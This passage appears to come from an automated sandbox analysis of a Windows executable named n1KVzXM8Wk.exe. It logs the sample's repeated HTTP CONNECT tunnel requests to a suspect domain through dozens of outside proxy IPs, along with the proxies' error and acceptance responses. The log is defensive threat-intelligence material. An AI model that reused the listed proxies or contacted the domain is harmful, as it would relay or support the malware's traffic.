                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      894192.168.2.45270546.226.148.105351986812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.806726933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.365710974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.975090027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      895192.168.2.452669103.146.137.910816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.823972940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      896192.168.2.452686177.12.118.160806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.823986053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      897192.168.2.452722166.62.87.148405916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.830344915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.284037113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.830173969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740988016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.589595079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333663940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.116156101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647223949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      898192.168.2.452774104.20.235.179806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.830344915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.917553902 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      899192.168.2.452666103.163.51.254806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.841468096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      900192.168.2.45273270.166.167.55577456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.857009888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      901192.168.2.452790172.67.254.127806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.860440969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.948364019 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      902192.168.2.45271381.228.38.238461156812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.860451937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      903192.168.2.45226250.63.13.361646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.860819101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.365705967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.866352081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865792990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      904192.168.2.45274645.5.118.439996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.861061096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.009583950 CET202INHTTP/1.0 404 Not Found
                                                                                                      Content-Length: 815
                                                                                                      Content-Type: text/html
                                                                                                      Date: Thu, 08 Feb 2024 15:32:27 GMT
                                                                                                      Expires: Thu, 08 Feb 2024 15:32:27 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      905192.168.2.449972138.68.24.185460356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.862107038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.865732908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866487980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      906192.168.2.452720146.59.2.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.865731955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      907192.168.2.452699186.124.164.213806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.894427061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      908192.168.2.452731146.59.70.29234496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.894504070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      909192.168.2.451817142.54.235.941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.904150963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      910192.168.2.452761162.248.227.140806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.908843994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      911192.168.2.45277172.206.181.10341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.917009115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      912192.168.2.45276882.64.77.30806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.917265892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.139796019 CET555INHTTP/1.1 403 Proxy Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Server: Apache
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 313
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      913192.168.2.45229818.229.253.47806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.927287102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.975063086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975424051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.975338936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      914192.168.2.450771166.62.88.163544456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.928325891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943860054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.944227934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.969564915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      915192.168.2.4527018.213.129.15836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.933722019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.225743055 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      916192.168.2.452719151.232.18.6656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.937124968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      917192.168.2.450738212.174.79.16580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.937544107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.975081921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975425005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      918192.168.2.452337188.68.52.22090506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.937799931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943860054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.944226980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.969580889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      919192.168.2.45072192.241.92.218148886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.937967062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      920192.168.2.45235138.172.128.2480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.938045025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943890095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.944228888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.969583988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.974910021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      921192.168.2.452836104.17.132.79806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.950752020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.046370983 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      922192.168.2.452315109.194.22.6180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.950781107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      923192.168.2.452167172.235.16.236806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.956275940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943958998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.944231033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.969593048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.974931955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
